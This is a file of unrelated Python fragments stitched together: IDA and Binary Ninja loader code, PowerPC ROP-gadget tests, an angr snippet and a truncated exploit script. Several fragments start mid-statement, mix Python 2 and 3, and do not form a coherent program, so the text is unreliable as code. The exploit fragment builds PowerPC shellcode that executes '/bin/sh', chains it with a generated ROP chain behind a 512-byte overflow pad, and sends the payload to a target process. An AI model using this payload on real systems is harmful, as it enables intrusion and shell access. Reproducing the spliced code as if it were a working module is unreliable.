def get_hardware_mode():
(arch, mode) = (None, None)
info = idaapi.get_inf_structure()
# heuristically detect hardware setup
info = idaapi.get_inf_structure()
try:
cpuname = info.procname.lower()
except:
cpuname = info.procName.lower()
try:
# since IDA7 beta 3 (170724) renamed inf.mf -> is_be()/set_be()
is_be = idaapi.cvar.inf.is_be()
except:
# older IDA versions
is_be = idaapi.cvar.inf.mf
# print("Keypatch BIG_ENDIAN = %s" %is_be)
if cpuname == "metapc":
if info.is_64bit():
arch = archinfo.ArchAMD64()
mode = KS_MODE_64
elif info.is_32bit():
arch = archinfo.ArchX86()
mode = KS_MODE_32
else:
arch = archinfo.ArchNotFound()
mode = KS_MODE_16
elif cpuname.startswith("ppc"):
if info.is_64bit():
arch = archinfo.ArchPPC64()
mode = KS_MODE_PPC64
else:
arch = archinfo.ArchPPC32()
mode = KS_MODE_PPC32
if cpuname == "ppc":
# do not support Little Endian mode for PPC
mode += KS_MODE_BIG_ENDIAN
elif cpuname.startswith("mips"):
if info.is_64bit():
arch = archinfo.ArchMIPS64()
mode = KS_MODE_MIPS64
else:
arch = archinfo.ArchMIPS32()
mode = KS_MODE_MIPS32
elif cpuname.startswith("systemz") or cpuname.startswith("s390x"):
arch = archinfo.ArchS390X()
mode = KS_MODE_BIG_ENDIAN
return (arch, mode)
def test_ppc_le(self):
tests = [
(
{
LoadMem: 1
},
'\x08\x00\xe1\x83' + # lwz r31,8(r1)
'\x04\x00\x01\x80' + # lwz r0,4(r1)
'\xa6\x03\x08\x7c' + # mtlr r0
'\x10\x00\x21\x38' + # addi r1,r1,16
'\x20\x00\x80\x4e'), # blr
]
self.run_test(archinfo.ArchPPC32(), tests)
def test_ppc_be(self):
tests = [
(
{
LoadMem: 2,
LoadMultiple: 1
},
'\x80\x01\x00\x1c' + # lwz r0,28(r1)
'\x80\x61\x00\x08' + # lwz r3,8(r1)
'\x80\x81\x00\x0c' + # lwz r4,12(r1)
'\x38\x21\x00\x20' + # addi r1,r1,32
'\x7c\x08\x03\xa6' + # mtlr r0
'\x4e\x80\x00\x20'), # blr
]
self.run_test(archinfo.ArchPPC32('Iend_BE'), tests)
def test_ppc(self):
arch = archinfo.ArchPPC32()
tests = [
(
[
'\x08\x00\xe1\x83\x04\x00\x01\x80\xa6\x03\x08\x7c\x10\x00\x21\x38\x20\x00\x80\x4e'
], # lwz r31,8(r1); lwz r0,4(r1); mtlr r0; addi r1,r1,16; blr
LoadMem,
['r1'],
['r31'],
[8],
['r0', 'lr'],
0x10,
0x4,
True),
]
self.run_test(arch, tests)
class BinjaBin(Backend):
"""
Get information from binaries using Binary Ninja. Basing this on idabin.py, but will try to be more complete.
TODO: add more features as Binary Ninja's feature set improves
"""
is_default = True # Tell CLE to automatically consider using the BinjaBin backend
BINJA_ARCH_MAP = {
"aarch64": archinfo.ArchAArch64(endness='Iend_LE'),
"armv7": archinfo.ArchARMEL(endness='Iend_LE'),
"thumb2": archinfo.ArchARMEL(endness='Iend_LE'),
"armv7eb": archinfo.ArchARMEL(endness='Iend_BE'),
"thumb2eb": archinfo.ArchARMEL(endness='Iend_BE'),
"mipsel32": archinfo.ArchMIPS32(endness='Iend_LE'),
"mips32": archinfo.ArchMIPS32(endness='Iend_BE'),
"ppc": archinfo.ArchPPC32(endness="Iend_BE"),
"ppc_le": archinfo.ArchPPC32(endness="Iend_LE"),
"x86": archinfo.ArchX86(),
"x86_64": archinfo.ArchAMD64()
}
def __init__(self, binary, *args, **kwargs):
super().__init__(binary, *args, **kwargs)
if not bn:
raise CLEError(BINJA_NOT_INSTALLED_STR)
# get_view_of_file can take a bndb or binary - wait for autoanalysis to complete
self.bv = bn.BinaryViewType.get_view_of_file(binary, False)
l.info("Analyzing %s, this may take some time...", binary)
self.bv.update_analysis_and_wait()
l.info("Analysis complete")
# Note may want to add option to kick off linear sweep
try:
self.set_arch(self.BINJA_ARCH_MAP[self.bv.arch.name])
except KeyError:
l.error("Architecture %s is not supported.", self.bv.arch.name)
for seg in self.bv.segments:
l.info("Adding memory for segment at %x.", seg.start)
br = bn.BinaryReader(self.bv)
br.seek(seg.start)
data = br.read(len(seg))
self.memory.add_backer(seg.start, data)
self._find_got()
self._symbol_cache = {}
self._init_symbol_cache()
# Note: this represents the plt stub. ImportAddressSymbol refers to .got entries
# Since we're not trying to import and load dependencies directly, but want to run SimProcedures,
# We should use the binaryninja.SymbolType.ImportedFunctionSymbol
# Also this should be generalized to get data imports, too
self.raw_imports = {
i.name: i.address
for i in self.bv.get_symbols_of_type(
bn.SymbolType.ImportedFunctionSymbol)
}
self._process_imports()
self.exports = {}
self.linking = "static" if len(self.raw_imports) == 0 else "dynamic"
# We'll look for this attribute to see if we need to do SimProcedures for any imports in this binary
# This is an ugly hack, but will have to use this for now until Binary Ninja exposes dependencies
self.guess_simprocs = True
self.guess_simprocs_hint = "nix" if self.bv.get_section_by_name(
".plt") else "win"
l.warning("This backend is based on idabin.py.\n\
You may encounter unexpected behavior if:\n\
\tyour target depends on library data symbol imports, or\n\
\tlibrary imports that don't have a guess-able SimProcedure\n\
Good luck!")
def _process_imports(self):
''' Process self.raw_imports into list of Relocation objects '''
if not self.raw_imports:
l.warning(
"No imports found - if this is a dynamically-linked binary, something probably went wrong."
)
for name, addr in self.raw_imports.items():
BinjaReloc(self, self._symbol_cache[name], addr)
def _init_symbol_cache(self):
# Note that we could also access name, short_name, or full_name attributes
for sym in self.bv.get_symbols():
cle_sym = BinjaSymbol(self, sym)
self._symbol_cache[sym.raw_name] = cle_sym
self.symbols.add(cle_sym)
def _find_got(self):
"""
Locate the section (e.g. .got) that should be updated when relocating functions (that's where we want to
write absolute addresses).
"""
sec_name = self.arch.got_section_name
self.got_begin = None
self.got_end = None
try:
got_sec = self.bv.sections[self.arch.got_section_name]
self.got_begin = got_sec.start
self.got_end = got_sec.end
except KeyError:
l.warning("No got section mapping found!")
# If we reach this point, we should have the addresses
if self.got_begin is None or self.got_end is None:
l.warning("No section %s, is this a static binary ? (or stripped)",
sec_name)
return False
return True
@staticmethod
def is_compatible(stream):
if not bn:
return False
magic = stream.read(100)
stream.seek(0)
# bndb files are SQlite 3
if magic.startswith(b"SQLite format 3") and stream.name.endswith(
"bndb"):
return True
return False
def in_which_segment(self, addr):
"""
Return the segment name at address `addr`.
"""
# WARNING: if there are overlapping sections, we choose the first name.
# The only scenario I've seen here is a NOBITS section that "overlaps" with another one, but
# I'm not sure if that's a heurstic that should be applied here.
# https://stackoverflow.com/questions/25501044/gcc-ld-overlapping-sections-tbss-init-array-in-statically-linked-elf-bin#25771838
seg = self.bv.get_sections_at(addr)[0].name
return "unknown" if len(seg) == 0 else seg
def get_symbol_addr(self, sym):
"""
Get the address of the symbol `sym` from IDA.
:returns: An address.
"""
# sym is assumed to be the raw_name of the symbol
return self.bv.get_symbol_by_raw_name(sym)
def function_name(self, addr):
"""
Return the function name at address `addr`.
"""
func = self.bv.get_function_at(addr)
if not func:
return "UNKNOWN"
return func.name
@property
def min_addr(self):
"""
Get the min address of the binary. (note: this is probably not "right")
"""
return self.bv.start
@property
def max_addr(self):
"""
Get the max address of the binary.
"""
return self.bv.end
@property
def entry(self):
if self._custom_entry_point is not None:
return self._custom_entry_point + self.mapped_base
return self.bv.entry_point + self.mapped_base
def get_strings(self):
"""
Extract strings from binary (Binary Ninja).
:returns: An array of strings.
"""
return self.bv.get_strings()
def set_got_entry(self, name, newaddr):
"""
Resolve import `name` with address `newaddr`. That is, update the GOT entry for `name` with `newaddr`.
"""
if name not in self.imports:
l.warning("%s not in imports", name)
return
addr = self.imports[name]
self.memory.pack_word(addr, newaddr)
def close(self):
"""
Release the BinaryView we created in __init__
:return: None
"""
self.bv.file.close()
"\x98\xb8\xfe\xfb" + # stb r5,-261(r24)
"\x38\x78\xfe\xf4" + # addi r3,r24,-268
"\x90\x61\xff\xf8" + # stw r3,-8(r1)
"\x38\x81\xff\xf8" + # addi r4,r1,-8
"\x90\xa1\xff\xfc" + # stw r5,-4(r1)
"\x3b\xc0\x01\x60" + # li r30,352
"\x7f\xc0\x2e\x70" + # srawi r0,r30,5
"\x44\x00\x00\x02" + # sc
"/bin/shZ" # the last byte becomes NULL
)
target_address = buffer_address + 700
print "shellcode ({} bytes) address: 0x{:x}".format(len(shellcode),
target_address)
rop = ropme.rop_to_shellcode([(filename, None, 0)], [], target_address,
archinfo.ArchPPC32('Iend_BE'), logging.DEBUG)
payload = 'A' * 512 + 'B' * 0x1c
# We need some custom gadgets to fixup the stack because of the PPC function saving the lr above the current stack frame
payload += struct.pack(">i", 0x10000670) + "C" * 12 + struct.pack(
">i", 0x1000066c) + "D" * 4 # how annoying
payload += rop
payload += ((700 - len(payload)) * 'E') + shellcode
payload += "JEFF" # To end our input
with open("/tmp/rop", "w") as f:
f.write(rop)
with open("/tmp/payload", "w") as f:
f.write(payload)
p.writeline(payload)
# Athens 2019, Figure 2.
# addi r3, r3, 0x1
# put X in r3, execute, find X+1 in r3
import angr
import pyvex
import archinfo
import claripy
import pdb
arch = archinfo.ArchPPC32(archinfo.Endness.BE)
s = angr.SimState(arch=arch, mode="symbolic")
x = s.solver.BVS('X', 32, explicit_name=True)
code = bytes(bytearray.fromhex("38630001")) # addi
irsb = pyvex.IRSB(code, 0x100, arch, opt_level=0)
irsb.pp()
s.regs.r3 = x
result = angr.SimEngineVEX().process(s, irsb).flat_successors[0]
r3 = result.regs.r3
result.regs.__dir__()
print "*************************"
print r3
def skip_test_ppc(self):
arch = archinfo.ArchPPC32()
tests = [
]
self.run_test(arch, tests)
